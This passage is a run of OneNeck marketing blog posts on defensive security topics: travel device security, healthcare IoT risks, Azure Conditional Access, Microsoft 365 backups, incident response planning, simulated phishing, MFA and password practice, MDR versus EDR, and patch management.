Physical security is also essential while traveling. You never know who might be looking over your shoulder in crowded places like airports or busy coffee shops. A skilled attacker can capture astonishing amounts of information by observing your screen.

To protect privacy, consider using a privacy screen on your devices. These screens make it difficult for others to see your screen from an angle, helping to prevent unwanted snooping. Privacy screens offer a relatively inexpensive and easily available solution that provides further security for your devices.

Protecting Sensitive Company Information

Your company’s security protocols, domain names, email addresses, applications and intellectual property are potential cyberattack targets. When traveling, it’s essential to stay vigilant in safeguarding this information, as it can be used to craft targeted attacks against your business or colleagues.

Exercise additional caution when using devices in public spaces, as cell phones with high-quality cameras can easily capture images of your screen or record conversations for later review. Always be mindful of your surroundings and take extra precautions to secure your company’s sensitive information.

Follow Company Protocols

Always follow your company’s guidelines for accessing and storing sensitive data while traveling. These procedures may include using encrypted devices or secure cloud storage services to protect your files. It’s also important to keep track of any physical documents containing sensitive information, as they can be easily lost or stolen during transit.

Ensure the use of strong, unique passwords for all accounts and enable multi-factor authentication (MFA) whenever possible. MFA adds an extra layer of security by requiring additional verification methods, such as a fingerprint or a one-time code sent to your mobile device.

If your devices are lost or stolen, enable remote wipe capabilities. This feature lets you erase all data from your devices remotely, preventing unauthorized access to sensitive information. Many organizations will require this as a standard component of device setup.

Protecting Personal Information on the Go

Ensuring data security while traveling is a shared responsibility that requires vigilance and good habits. You can better protect personal and business data from potential threats by following the tips outlined here. Always use your charging equipment, connect to secure networks through a VPN, use privacy screens and be cautious with sensitive information. By adopting these everyday security practices, you can enjoy peace of mind and focus on making the most of your travels. Stay safe and make digital security a top priority.

Data Security with a Trusted Partner

Protecting your personal or company data is always more effective when collaborating with a trusted partner. OneNeck offers a comprehensive approach to security services, ensuring the safety of your organization’s data in the cloud, on-premises, or within a hybrid environment. In addition, we provide practical security awareness training through extensive collaborations with trusted partners. This training educates users, effectively reducing risk and enhancing your organization’s security culture.

Ready to enhance your personal and organizational security? Contact us today to speak with a OneNeck security expert and take the first step toward a more secure future.

The Internet of Things (IoT) has become a vital part of the healthcare industry, greatly impacting patient interaction and treatment. These connected devices collect and transmit patient data, allowing providers to monitor and manage patient health more effectively. However, the widespread adoption of IoT in healthcare exposes the industry to new risks, leading to a surge in security threats.

A 2023 SonicWall Cyber Threat Report shows that malware attacks against IoT in the medical field increased by 123% in 2022. The result is a significant threat to the privacy and safety of patient information.

Data Collection Through IoT in Healthcare

IoT devices are now nearly ubiquitous in the medical field, collecting patient information to improve diagnosis, treatment and overall care. Some of the most common types of data collected are:

• Vital signs– IoT devices can continuously monitor patients’ heart rate, blood pressure, oxygen saturation and other vital signs, allowing healthcare providers to track real-time health status.
• Activity levels– Wearables and sensors track patients’ movements and activities, providing insights into daily routines, exercise habits and sleep patterns.
• Medical device data– Connected devices, such as insulin pumps and pacemakers, transmit data on their operation and status, enabling doctors to monitor performance and make necessary adjustments remotely.
• Health history– Electronic health records (EHRs) store patients’ medical histories, including previous diagnoses, treatments and medications. Providers can access and update this information, improving care coordination and decreasing the risk of errors.

Healthcare IoT Security Risks and Protecting Patient Data

This significant increase in IoT malware attacks against the healthcare sector is particularly concerning when viewed in the context of a Cynerio 2022 State of Healthcare IoT Device Security report. This study revealed that 53% of hospital IoT devices have security vulnerabilities. Devices that fell into the most vulnerable category included IV pumps, VoIP phones, ultrasounds, medicine dispensers and IP cameras.

These weaknesses pose significant risks to both patients and healthcare providers. One primary risk is data breaches. Cybercriminals exploit IoT security vulnerabilities to gain access to sensitive patient data, leading to identity theft, fraud or other malicious activities.

Another risk is ransomware, where attackers can encrypt patient data and demand payments in exchange for release. These attacks can disrupt healthcare operations and in extreme cases potentially endanger patients’ lives.

Device manipulation is an additional security risk. Cyberattackers can compromise IoT devices, altering their functionality and putting patients in jeopardy of receiving incorrect treatments or experiencing adverse health events. This type of threat not only endangers patient safety but can also undermine faith in the healthcare system as a whole.

Safeguarding Patient Information with Security Best Practices

To safeguard patient data and maintain the advantages of IoT devices in healthcare, healthcare providers must take a proactive approach to implementing security measures. These include:

• Periodically reviewing IoT devices to identify potential vulnerabilities and prioritize security updates.
• Encrypting patient data at rest and in transit to safeguard it against interception and unauthorized access.
• Implementing robust authentication methods, such as two-factor authentication, helps protect IoT devices and ensure only authorized personnel access patient data.
• Healthcare providers should work closely with IoT device manufacturers and software vendors to promptly apply security patches and updates.
• Providers must ensure staff are well-versed in cybersecurity best practices. Knowing the risks associated with IoT devices is crucial in creating a culture of security awareness.
• Developing a comprehensive incident response plan helps healthcare organizations quickly identify, contain and remediate security breaches, minimizing their impacts.
• Healthcare providers must comply with industry-specific regulations, such as HIPAA, which sets strict criteria for safeguarding patient data and protecting privacy.

Building a Secure Future for IoT in Healthcare: Partnering for Success

IoT devices have transformed the healthcare sector, providing real-time data that enables providers to manage patient health more efficiently and effectively. However, the growing reliance on connected devices presents unique challenges in ensuring the privacy and safety of patient information. By implementing robust security measures and maintaining a proactive approach to risk management, healthcare organizations can harness the benefits of IoT technology while safeguarding the trust and well-being of their patients.

Securing your IoT devices, while extremely important, is just one part of healthcare security. OneNeck recognizes the critical nature of securing patient data and is dedicated to offering holistic security services that adhere to the strictest compliance standards. By partnering with OneNeck, healthcare organizations can update legacy systems, implement securely architected cloud solutions, design and implement robust backup and DR services, develop incident response plans and ensure continuous alignment with regulatory requirements.

Ready to talk to a security expert? OneNeck is here to help. Contact us today to discuss how you can better protect sensitive patient data and maintain a secure and healthy environment.

As organizations embrace cloud services and remote work to fuel business growth, they must reassess conventional security measures to safeguard sensitive data, applications and resources. Microsoft Azure Active Directory (Azure AD) offers Conditional Access as a powerful security solution, allowing companies to control access through user identity, device, location and other contextual variables. This blog delves into Conditional Access policies, examines their significance for cybersecurity and discusses how they can enhance an organization’s security posture.

Understanding Conditional Access Policies

Conditional Access policies, at their most basic, are if-then statements; if a user desires to access a resource, they must complete an action. Example: A remote employee wants to access the company’s intranet portal and is required to connect through a secure VPN.

Conditional Access policies are rules and conditions within Azure AD that help organizations manage access to resources, applications and data. They enable administrators to enforce granular access controls based on the user’s access requests context, such as their device, location or risk level. The policies consist of several components, including assignments that specify the users, groups and applications to which a policy applies. Conditions determine the circumstances for policy enforcement, while access controls define the actions taken when a policy is triggered.

Once first-factor authentication is complete, the system applies Conditional Access policies. While Conditional Access does not serve as an organization’s first line of defense for scenarios like denial-of-service (DoS) attacks, it can utilize signals from these events to determine access. – Microsoft

Importance for Cybersecurity

Conditional Access improves an organization’s cybersecurity posture for several reasons:

• Context-Aware Security – By considering user identity, device and location factors, organizations can make informed decisions about granting access and minimizing the risk of unauthorized access to sensitive data.
• Adaptive Authentication – Implementing adaptive authentication mechanisms, like multi-factor authentication (MFA) when necessary, provides an additional security layer, especially during access to crucial resources, by adjusting authentication requirements based on contextual factors such as user behavior, device, location, time and other risk indicators.
• Simplified Management – Azure AD’s centralized management console allows administrators to easily create, modify, and enforce organizational policies. This ability streamlines the process of managing access controls and reduces the likelihood of misconfigurations or security gaps.
• Compliance Assurance – Organizations with strict compliance requirements can enforce specific access controls for regulated data and applications, thus meeting regulatory obligations and reducing the risk of fines or penalties.
• Improved User Experience – Dynamically enforcing access controls based on context helps balance security and usability, allowing users to access resources seamlessly while protecting sensitive data and systems.

Implementing Conditional Access Policies in Your Organization

To effectively deploy Conditional Access policies within your organization, start by assessing security needs. Identifying critical applications, data and resources requiring enhanced security helps prioritize the policies to create and apply.

Next, establish access requirements for each sensitive resource, taking into account factors such as user roles, device compliance and geographic location. Create Conditional Access policies based on the defined requirements and test them in a controlled environment before deploying them across the organization. This approach ensures the policies function as intended and do not inadvertently disrupt access for legitimate users.

Regularly monitoring and adjusting your policies is essential to address new risks, changes in the threat landscape or evolving business requirements. Additionally, educating users is crucial. Inform them about the importance of Conditional Access policies and their role in resource protection. Encourage users to follow best practices for secure access, such as using MFA, keeping devices up-to-date and reporting suspicious activity.

Finally, integrate Conditional Access policies with other security solutions in your organization, such as threat intelligence, data loss prevention (DLP) and identity and access management (IAM) tools. This integration delivers a more comprehensive security approach.

Break the Glass Account

A “Break the Glass” account is an emergency account created within an organization’s IT environment to ensure continued access to critical systems and resources in case of unforeseen events. These emergencies could include a significant security incident or a misconfiguration in Conditional Access policies. These accounts must be created with highly privileged access and strong security controls.

The necessity of a Break the Glass account when using Conditional Access lies in the possibility of accidentally locking out administrators or users from essential resources, applications or services due to policy misconfigurations or unexpected changes in the organizational environment. In such situations, the Break the Glass account serves as a failsafe that allows designated personnel to regain access and rectify the issue, ensuring business continuity and minimal disruption. These accounts are also crucial to an effective incident response plan, enabling organizations to respond quickly to and recover from security breaches or other critical incidents.

Final Thoughts on Conditional Access Policies

Conditional Access is a basic and necessary component of modern cybersecurity strategies. By implementing context-aware access controls and adaptive authentication mechanisms, organizations can balance security and usability, allowing users to access resources when needed while protecting sensitive data and systems. As a fundamental aspect of access management, Conditional Access policies should be a priority for organizations looking to strengthen their security infrastructure.

While Conditional Access policies effectively help combat cyberattacks, they are only one aspect necessary to protect your data. OneNeck understands a holistic approach to security is essential for protecting your organization and its precious resources. As a skilled IT security services provider, we are here to help. Our team can assess your security posture, develop a protection strategy and help better leverage your security investments.

Contact us today to speak with a OneNeck security professional.

Why You Should Stay on Top of Microsoft 365 Data Backups

Businesses everywhere rely on Microsoft 365 for its cloud-based design and advanced collaboration. It is integral to many organizations’ services and workflows.

Sometimes, however, core tools like this can lull customers into a false sense of security. Over 40% of IT organizations say they no longer backup their Microsoft 365 data with third-party applications, even though Microsoft itself stresses the importance of Microsoft 365 data backups. This article discusses six important reasons organizations should always back up their Microsoft 365 data.

Do I need to back up Microsoft 365 data?

Backing up your Microsoft 365 data ensures that no matter what happens, you’ll always be able to recover your important files. Microsoft has some catastrophic guardrails in place in case your entire system crashes, but they don’t protect against accidental deletion or overwriting.

A regular backup schedule based on the frequency you create and update your documents and media will give you more control over your files — and give you significant peace of mind. Performing your own backups also allows for granular recovery, so you can restore a single file or email, rather than overwriting all data.

How often should I do a Microsoft 365 data backup?

Your backup schedule will depend on your organization’s compliance requirements, how often you access and make changes to your data, and how much downtime you can afford in the event of data loss. Downtime cost organizations an estimated $84,650 per hour in 2021. Organizations may need to perform data backups several times a day or as frequently as every five minutes to stay protected and in compliance.

Frequent backups give you up-to-date data recovery in the event of accidental deletions, as well as a recent restore point if a large part of your data is compromised by a ransomware attack.

Who is responsible for a Microsoft 365 data backup?

Microsoft 365 documentation states that Microsoft maintains the 365 application and infrastructure, while the customer is “…responsible for protecting the security of your data and identities, on-premises resources, and the cloud components you control.” That means you’re responsible for data backup and retention.

6 Important Reasons to do Microsoft 365 Data Backups

Here are six important reasons for regular Microsoft 365 data backups in your organization.

• Microsoft 365 Data Backup Reason 1: Accidental Deletion
  We’ve all had that moment when we accidentally hit the “delete” button on a document — and then panicked. Regular backups make it simple to recover accidentally deleted files or emails so you don’t have to start an extensive project from scratch.This is especially important if you’ve accidentally deleted a Microsoft 365 user. Deleting a user account automatically replicates across the network, along with their personal SharePoint site and OneDrive data. Once the account is deleted, it’s gone from the entire network. You can only get user account data back by restoring it from a backup.
• Microsoft 365 Data Backup Reason 2: Internal Security Threats
  Threats from inside the organization may be intentional, such as a disgruntled employee, or unintentional, such as an employee who clicks on a link in a phishing email. In the event of data loss from internal threats, backups let you restore files necessary for daily operations.
• Microsoft 365 Data Backup Reason 3: External Security Threats
  External threats include malware, viruses, and ransomware. These malicious programs can corrupt or delete data and applications, bringing business to a halt. The importance of a Microsoft 365 data backup is that you can restore a clean copy of your data and cut your recovery time.
• Microsoft 365 Data Backup Reason 4: Legal Compliance
  Certain industries and locations require data to be stored for a specified amount of time. For example, the U.S. financial regulation Sarbanes-Oxley has specific data retention rules. Organizations that fail to meet these regulations can be subject to fines and penalties.
• Microsoft 365 Data Backup Reason 5: Outages and Shutdowns
  Off-site data backups are extremely important when organizations experience an unplanned outage or shutdown due to hardware or software failure, or after a natural disaster. Terabytes of data that might have been lost can be restored quickly, getting everyone back on the task of building the business.
• Microsoft 365 Data Backup Reason 6: Overall Business Continuity
  Business continuity is incredibly important for growing businesses with an expanding technology portfolio. Backups let you remain in control of your data and lower your downtime in the event of a data loss due to deletion, threats, or outages.

Does Microsoft 365 Recommend Backups?

Microsoft highly recommends backing up your 365 data. You don’t necessarily need to back up every file but prioritize content that can’t be easily replaced.

Microsoft does back up Microsoft 365 data every 12 hours and keeps it for 14 days. However, if you need to restore from their backup, it will be a full restore — everything will be overwritten. You can’t recover a single data point, like a file or an email.

Safeguard your Microsoft 365 Investment: Backup your Data

No one plans to lose files. But when you need to restore lost data, you’ll be glad you have a robust backup plan.

The importance of Microsoft 365 data backups cannot be overstated. That’s why OneNeck has partnered with Commvault to bring you Metallic^® Microsoft 365 backup to help protect your documents, emails, and conversations.

Metallic backup offers powerful, enterprise-grade Microsoft 365 data protection across Exchange, Teams, OneDrive, and SharePoint data. With Metallic backup, you’ll get seamless SaaS data protection and hassle-free deployment, with 24/7 Microsoft expert support provided by OneNeck (with optional monitoring available).

Learn about how OneNeck and Commvault Metallic keep Microsoft 365 data safe from deletion and attack, with the simplicity of SaaS. Read about our Microsoft 365 backup solution here.

How Incident Response Planning Helps Contain Cyberattacks

Despite businesses pouring resources into cybersecurity, breaches aren’t going away — or even slowing down. In 2022 alone, companies reported a near-record 1802 breaches, affecting 422.1 million people.

Unfortunately, it’s not a matter of if your data will be breached, it’s a matter of when.

Incident response planning helps your organization prepare for security incidents by outlining objectives, processes, and evaluation criteria your team can follow every step of the way. Your organization’s custom plan will guide you through the aftermath of a breach, assist in recovery, and help you fix the vulnerabilities that led to the incident.

What is incident response planning?

Incident response planning means taking the time before a breach occurs to write down the actions you’ll take after it occurs. The Cybersecurity and Infrastructure Security Agency (CISA) describes an Incident Response Plan as a written strategy, approved by your organization’s senior leadership, that guides your organization before, during, and after a confirmed or suspected security breach.

Why do you need an incident response plan?

Once a breach happens, time is of the essence. You need to stop the attack, minimize the damage, and fix the problem quickly so that you can return to work. That’s why pre-planning is essential. By determining your incident response plan before a breach occurs, you’ll know which employees are responsible for which actions, when, and how they will complete them — speeding up your recovery time.

Having a written incident response plan and securing leadership approval tells your team exactly what to do and who will do it.

How do you write an incident response plan?

Starting your incident response plan with a blank page can be difficult. Instead, begin with the guidance the National Institute of Standards and Technology (NIST) issued for computer security incident response. The NIST Special Publication 800-61, Rev. 2 provides a framework for creating your own plan.

Along with NIST’s guidance, customize your incident response plan for your organization by assessing your:

• assets and their level of risk
• priorities
• potential vulnerabilities
• communication methods
• incident response team members
• distribution of responsibilities

And, of course, once you write your plan, you’ll need to train your team members so they can effectively communicate and mitigate when the next incident occurs.

The 6 Incident Response Phases

At a minimum, your plan should cover these phases of incident response and recovery:

• Incident Response Planning Phase 1: Prepare
  During the first phase of incident response, ensure that your employees understand their roles and the steps they must take to respond. Practice your response procedures with exercises designed to simulate a breach. You’ll also use this phase to determine how you’ll identify breaches through testing, logs, alerts, or other procedures.
• Incident Response Planning Phase 2: Identify
  You can receive an immediate alert that an attack may be taking place by implementing a monitoring tool or partnering an MDR provider. You may also be notified by receiving communication from another organization, law enforcement, or a customer. Once your team has evaluated the alert and determined that an attack is taking place, you’ll kick off the remainder of the incident response phases.
• Incident Response Planning Phase 3: Control and Contain
  You know you have a breach; now it’s time to do something about it. Prevent further damage by isolating the network segment or infected servers. Document exactly what happened and the extent of the damage. If possible, preserve forensic data so you can analyze it in the Review phase.
• Incident Response Planning Phase 4: Resolve
  Fix the vulnerability that caused the breach by removing malware, hardening and patching systems, and applying software updates.
• Incident Response Planning Phase 5: Recover
  Return the isolated systems to regular operation and restore normal business processes.
• Incident Response Planning Phase 6: Review
  Gather the incident and the forensic evidence you documented for the incident response team. Analyze the breach, and the team’s response, and discuss the lessons learned from the process. Revise your incident response plan based on what worked and what didn’t so you’re fully prepared for the next incident.

Protect Your Network with Incident Response Planning from OneNeck

Incident response planning can make the difference between a quick recovery from a data breach and a long, painful one. That’s why OneNeck’s security experts can work with you to prepare an incident response plan and recover from breaches faster — so you can get back to business.

OneNeck has your back. Read more about our incident response services here.

Anyone who watched TV in the 90s will undoubtedly remember the NBC PSAs with the catchy jingle, “The more you know…”. It was sage advice then, and in today’s modern technological world, where cybersecurity is paramount, it still holds true. As such, businesses are increasingly embracing education related to cybersecurity. These organizations realize that there must be a focus on both external and internal threats, with increased awareness of the defenses that staff can employ.

Simulated Phishing Campaigns

Many businesses find that training services like those offered by OneNeck partner, KnowBe4, are effective options to protect both data and personnel. One specific strategy employed is to simulate common threats that focus on the human element through phishing campaigns. This approach is particularly valuable since, according to Verizon’s 2022 Data Breaches Investigations Report, 82% of data breaches involved a human component.

Through these simulated phishing attacks, end users can increase awareness of the methods used by attackers and the proper procedures to follow upon identifying such an attack.

Pushback Against Simulated Phishing Attacks

I recently listened to a podcast where a story was shared about an arguably ill-timed simulated phishing attack that a company ran against its employees. This particular business was in the process of rolling-out organizational-wide Multi-Factor Authentication. The simulated phishing attack – allegedly not coordinated on purpose to coincide with the MFA effort – implied that recipients needed to follow the email link to complete an MFA task. The podcaster – who works from home and has youngsters at home – was among those inside the company who fell victim to the simulated attack.

As they shared the events, they placed some blame for falling victim to the attack on outside distractions – notably balancing work and home life with littles. (Whether it’s children, pets, mobile devices, etc., we all know distraction far too intimately.) While admitting ultimate responsibility for falling victim to the simulation, they expressed significant frustration surrounding the timing. They decried the simulated attack as counter-productive when the organization’s goal was to get employees to buy in and support the MFA effort.

The Perfect Time

While I appreciate the expressed frustration, there are a few reasons that I believe the timing was not only excellent but should, in fact, be coordinated to align with company initiatives, such as the implementation of MFA.

1. Attackers and bad actors don’t exactly work within a system of morals and ethics. They will exploit as many opportunities and weaknesses as they can find. Testing employees using guerrilla-style tactics theoretically serves to better educate and prepare users within the target audience.
2. Multitasking (read: distraction) is an attacker’s best friend. Most of us have our attention divided by at least a few things at any given moment. When we make snap judgments or act without thought or careful review of what we are looking at, the odds of making a costly mistake skyrocket.
3. Security in layers is critical for any organization. Educating users is a significant step in the right direction, but as we’ve seen, other factors come into play – and ultimately, we’re only human. IT organizations should employ overlapping solutions that prevent a distracted mistake or clever attack vector. Policy and procedure should be augmented by solutions like MFA, email filtering, and DNS filtering, to name a few. Layers of human and technical defenses together are key.

The More You Know with OneNeck and KnowBe4

Cyberthreats remain highly dynamic and ever-changing to adapt to defenses and human nature. Proactive measures such as education and coordinated campaigns help condition users on what to look for and can be highly effective tools. Simulated phishing campaigns stand out as a particularly successful method to train employees and raise awareness about the importance of cybersecurity. By simulating common threats that focus on the human element, end-users can become more accustomed to the methods used and the proper procedures to follow when discovering such attacks.

However, it’s important to note that educating users is just one step in reducing the likelihood of a cybersecurity breach. Investment in procedure/planning and defensive technical solutions is crucial in adequately protecting your business. Organizations should employ overlapping solutions that prevent a distracted mistake or clever attack vector.

In today’s fast-paced technological world, businesses must take cybersecurity seriously to avoid costly and damaging breaches. By incorporating education, training, and defensive technical solutions, organizations can significantly reduce the likelihood of a breach and protect their data and infrastructure.

Have questions about awareness, training or any aspect of cybersecurity? Contact us today to speak with a OneNeck security expert.

If you’ve ever used Microsoft 365, you’ve likely encountered multi-factor authentication (MFA). And if you’re like most, you probably find it a bit of a hassle. But the truth is that MFA is essential today, where cyberattacks are becoming increasingly common. In this blog, we’ll explore the importance of MFA and other steps to keep your accounts secure.

The Problem with Passwords

Passwords are the most common form of authentication. And while better than nothing, they’re not particularly secure. One of the most significant issues is their vulnerability to being compromised. Cyber-attackers employ various methods to obtain passwords, including phishing, keyloggers and dictionary attacks. Additionally, many users choose weak passwords, such as “123456,” “password,” or “guest,” making it simple for hackers to access accounts and steal sensitive information, putting users’ data at risk.

However, using passwords that are not easily guessable creates challenges in password retention. With numerous accounts and logins to remember, it can be challenging to track them all. As a result, people often reuse passwords across multiple accounts or write them down, leaving them vulnerable to security breaches.

Even with best practices in place, there are still risks. If an organization’s password database is compromised, all its users’ passwords are exposed. Several high-profile breaches have compromised millions of passwords and associated user IDs.

Better Passwords

Passwords are the first line of defense against unauthorized access to accounts. Therefore, it’s essential to make them as secure as possible. Complex passwords should include letters (upper and lowercase), numbers and symbols. By using a mix of characters, passwords become more challenging to crack.

According to Microsoft, passwords should be at least 14 characters long. Lengthier passwords make it harder for attackers to use brute-force methods to crack them. However, longer passwords can be harder to remember. One way to manage password length is to use passphrases. A passphrase is a sentence or combination of words that are easy to remember but difficult to guess.

Microsoft also recommends users change passwords periodically. Over time, passwords can become compromised. Organizations can reduce this risk by compelling users to change their passwords regularly. However, it’s important to note that changing too frequently can be counterproductive, creating weaker passwords or resulting in the user writing them down.

Finally, using a good password manager is helpful. Password managers can generate strong passwords, store them securely and automatically fill them in when needed. By employing a password manager, users do not have to remember every password while still keeping them safe from prying eyes.

Better Accounts

Creating a “break-the-glass” account is a critical security measure every organization should consider. In a security breach, having an emergency account with the highest level of access can be a lifesaver. However, it’s crucial to remember using this account should only occur in extreme situations. Companies must store these account credentials securely and make them accessible only to a limited number of individuals.

Assigning roles and permissions to security groups is another worthwhile step in securing your accounts. Limiting resource access is vital so users can only access what they need to do their job. Separating admin and user accounts is also critical and reduces the risk of security breaches. Admin accounts should only be used when necessary and assigned on a limited basis.

When it comes to admin accounts, it’s essential to have control over them. Privileged Identity Management (PIM) and Privileged Access Management (PAM) are two solutions that can provide the necessary controls. PIM allows you to manage, monitor, and audit the use of privileged accounts and resources. PAM isolates privileged accounts to reduce the risk of stolen credentials and helps re-establish control over a compromised Active Directory environment by maintaining a separate bastion environment unaffected by malicious attacks.

MFA and Conditional Access Policies

Microsoft recommends using conditional access policies to enforce layers of control around admin and user accounts. These policies often require MFA and specify where, when, what, and how users can access specific resources. Additionally, they log the use of privileged accounts to track who is accessing what.

Conditional access policies also provide an extra control layer to secure admin and user accounts. Conditional access policies allow organizations to set specific rules around access to resources based on conditions, such as user location, the device used and even the time of day.

For example, you could create a conditional access policy that requires MFA for any user attempting to access your company’s financial data outside of regular business hours or from an unrecognized device. This example ensures only authorized individuals access critical financial information under specific circumstances that meet your organization’s security standards.

Implementing MFA and conditional access policies strengthen your organization’s security posture and reduce the risk of security breaches. As always, it’s essential to work with a trusted IT partner like OneNeck to ensure security measures are correctly implemented and maintained.

The MFA Difference

So how much of a difference does MFA truly make? According to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), MFA can prevent 99.9% of hacks. Even if a cyber attacker compromises your password, they won’t be able to meet the second authentication requirement, which ultimately stops them from gaining access to your accounts.

MFA is not a one-size-fits-all solution but rather an essential step in securing your accounts. While it may seem like a hassle to set up MFA and follow password management and account protection best practices, it is important to remember that the consequences of a data breach or account compromise can be far-reaching and costly. In addition to the potential loss of sensitive data, there can be legal and regulatory ramifications, reputational damage, and financial losses. It is much better to take proactive measures to prevent these outcomes than to deal with the aftermath of an attack.

Another benefit of MFA is that with a bit of finesse and conditional access, it can improve or at least minimally impact the user experience. While the initial setup and authentication process may take a few extra seconds, users feel more secure knowing that an additional layer of security protects their accounts. Additionally, many MFA solutions offer the option for “remembered devices” or “trusted locations” where the user will not be prompted for an MFA login. This automation makes the process smoother and less disruptive while maintaining security.

It is worth noting that while MFA is highly effective at preventing most types of account attacks, it is not the end of your security journey. Some attacks, such as phishing or social engineering, can bypass MFA by tricking the user into providing their credentials to a malicious actor. Additional layers, such as Endpoint protection, will be the next step on your path to a more secure environment.

Get the Most from Microsoft 365 with OneNeck

Whether you need support securing Microsoft environments, backing up M365 data or maximizing your licensing investment, OneNeck is here to help. We are a skilled Microsoft Cloud Service Provider with wide-ranging experience assisting hundreds of clients throughout their M365 adoption journey. Let us help you find the right-fit solutions for your organization’s productivity needs.

Contact us today to speak with a member of our team.

With 70% of breaches today originating at endpoints—such as servers, laptops, Internet of Things (IoT), and mobile devices—it’s increasingly important for organizations to implement a robust security strategy like managed threat detection and response to protect against threats. But navigating the threat detection and response solutions landscape can be confusing, especially for businesses that lack deep cybersecurity expertise.

This article describes two popular approaches to threat detection and response and helps you choose the right one for your business.

What Is Managed Threat Detection and Response?

Managed detection and response (MDR) is an outsourced cybersecurity solution offered by a managed security service provider (MSSP). MDR comprises a

comprehensive array of network, host, and endpoint security tools that perform ongoing monitoring to identify and respond to threats pre-emptively. MSSPs also provide specialized cybersecurity expertise.

What Is MDR vs. EDR?

Unlike MDR, which is a service, endpoint detection and response (EDR) is a cybersecurity platform that helps organizations identify and respond to threats that target vulnerable, network-connected endpoints. The biggest difference between EDR and MDR is scale.

Managed Detection and Response Addresses Common Security Threats

To manage threats effectively, organizations first need to know what kinds of threats MDR can help mitigate. This list covers the most common types.

Ransomware

Ransomware is malware that attacks a computer, network, or server. Malicious software locks the victim’s device, then a cybercriminal demands payment to restore it.

Phishing

Phishing attacks target individuals using social engineering methods, such as email, phone, texting, and social media. They aim to manipulate the recipient into revealing sensitive information like their password or credit card number. Some phishing attacks install viruses on the victim’s device.

Denial of Service

Denial-of-Service (DoS) attacks target organizations with the goal of disrupting business operations by inundating a network or server with spam requests. When the target becomes overwhelmed, necessary business services become unavailable, so employees can no longer perform their tasks. Although DoS attacks rarely exploit ransomware, the disruption they cause can be costly.

A Distributed Denial-of-Service (DDoS) attack is a more serious type of DoS attack. Here, multiple machines overload an edge network device—such as a router or switch—rather than targeting a server.

Man in the Middle

Man in the Middle (MitM) refers to a category of identity-based cyberattacks in which a bad actor surreptitiously eavesdrops on an online communication between a client and a server. The most common MitM attack exploits vulnerabilities in the victim’s browser to inject malware into their device. Cybercriminals commonly use MitM attacks to capture sensitive financial data in real time by intercepting traffic between a user and a banking website.

Other cybersecurity threats

Today’s cybersecurity environment includes many other dangers, including blended threats that leverage multiple methods and previously unseen zero-day threats.

As the IT perimeter continues to blur, organizations need to stay ahead of threats, such as

• Sophisticated mutating software
• Advanced persistent threats (APTs) that gather intelligence through surveillance
• Cloud vulnerabilities
• Web application attacks, such as a SQL injection (SQLI)
• Supply chain attacks that target trusted relationships and third parties
• Spoofing attacks disguised as legitimate websites and email addresses

How to Get the Protection You Need

OneNeck partnered with Fortra’s Alert Logic to bring together a powerful set of capabilities that ensure businesses get all the security protection they need:

• The Platform—Provides comprehensive security coverage, regardless of whether your workloads are in one or many clouds, containers, serverless, or on premises
• The Intelligence—Includes dozens of seasoned security researchers, data scientists, and engineers with vast industry experience
• The Expertise—Fortra’s 150 skilled security operations center (SOC) analysts partner with OneNeck’s security experts, who act as your point of contact. As your managed services provider, we understand your IT environment and are committed to keeping it safe.

Let Fortra’s Alert Logic and OneNeck Protect Your Network

No organization is too small to experience a breach. Make sure you don’t become a victim.

Do you need a better security strategy for the cloud or expert security talent to help protect your IT infrastructure? Or maybe you just want to reduce your total cost of ownership (TCO)?

Together, One Neck and Fortra’s Alert Logic can help you implement a managed threat detection and response strategy that provides comprehensive security in today’s risky IT landscape.

Contact us to learn how you can protect against threats in real time.

Frequently asked questions…

Does MDR replace SIEM?

Managed Detection and Response (MDR) and Security Information and Event Management (SIEM) are both security solutions, but they serve different purposes and are not direct replacements for each other. SIEM is primarily focused on log management, correlation, and event analysis to provide a comprehensive view of security threats, while MDR is a more proactive solution that combines threat intelligence, behavior analytics, and expert analysis to detect and respond to advanced threats.

What’s the difference between MSP and MSSP?

Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) both provide managed services to clients, but their focus areas differ. MSPs primarily provide managed services for IT infrastructure and operations, while MSSPs specialize in managed security services, such as threat detection, incident response, and compliance management. MSSPs typically offer a broader range of security-focused services and have more specialized expertise than MSPs.

Is EDR the same as antivirus?

Endpoint Detection and Response (EDR) and antivirus (AV) software are both security solutions that protect against malware and other threats, but they have different approaches and capabilities. AV software uses signature-based detection to identify known threats and prevent them from infecting the system, while EDR is a more advanced solution that uses behavior-based analysis and machine learning to detect and respond to both known and unknown threats.

What is endpoint security?

Endpoint security refers to the practice of securing endpoints, such as desktops, laptops, smartphones, servers, and other network-connected devices, from cyber threats. The goal of endpoint security is to protect these endpoints from unauthorized access, data theft, malware, and other types of cyberattacks by using a combination of technologies, tools, and policies to detect, prevent, and respond to threats.

What is Patch Management?

Patches are software and operating system updates that address security vulnerabilities and are used to keep all digital assets up to date. On an individual level, patch management is fairly straightforward. A vulnerability is discovered, a patch is developed and then run by the end-user when time allows or performed via the system’s auto-update feature.

Scaling up to an organizational level, however, significantly increases complexity, and efficient patch management becomes a necessity. Systems today are interconnected, and changes or downtimes in one area can have unforeseen and unintended effects throughout an organization. Because of these factors, many businesses struggle to implement company-wide patching, leaving themselves vulnerable to cyber attacks or other disasters.

Importance of Patching

Patching foremost helps secure computer systems and servers against potential security threats. Cybercrime is a problem all organizations face, and malicious actors constantly search for new ways to exploit known vulnerabilities. A report from Positive Technologies shows 31% of companies have detected attempts to exploit software vulnerabilities.

Organizations can close security gaps by regularly applying patches and preventing attackers from accessing sensitive data or compromising systems. While neglecting to promptly patch systems leaves them vulnerable to cyberattacks, data breaches, loss of sensitive information or financial damage. According to a Ponemon survey, unpatched vulnerabilities were involved in nearly 60% of data breaches.

Patching also helps maintain the stability and compatibility of software systems. Many patches include fixes for bugs and other issues that can cause the software to crash or behave unexpectedly. Patching ensures that software remains functional and uninhibited by errors, reducing the risk of downtime and the need for costly technical repair.

In addition to resolving bugs and security issues, patching often provides access to new features and enhancements. Software vendors regularly release updates that add new functionality. Organizations can utilize these improved features to enhance their workflow.

Finally, patching is essential for compliance with various regulatory requirements. Many industries are subject to strict regulations and standards that require the protection of sensitive information and consistent maintenance of technical environments. By regularly patching systems and servers, organizations can demonstrate their adherence to these regulations and avoid potential legal penalties.

Common Problems with Patch Management

While the benefits of patching are pretty straightforward, many organizations face challenges in implementing a consistent approach to patch management. There are several reasons why system-wide patch management is problematic for businesses, including:

Complex IT Environments­­

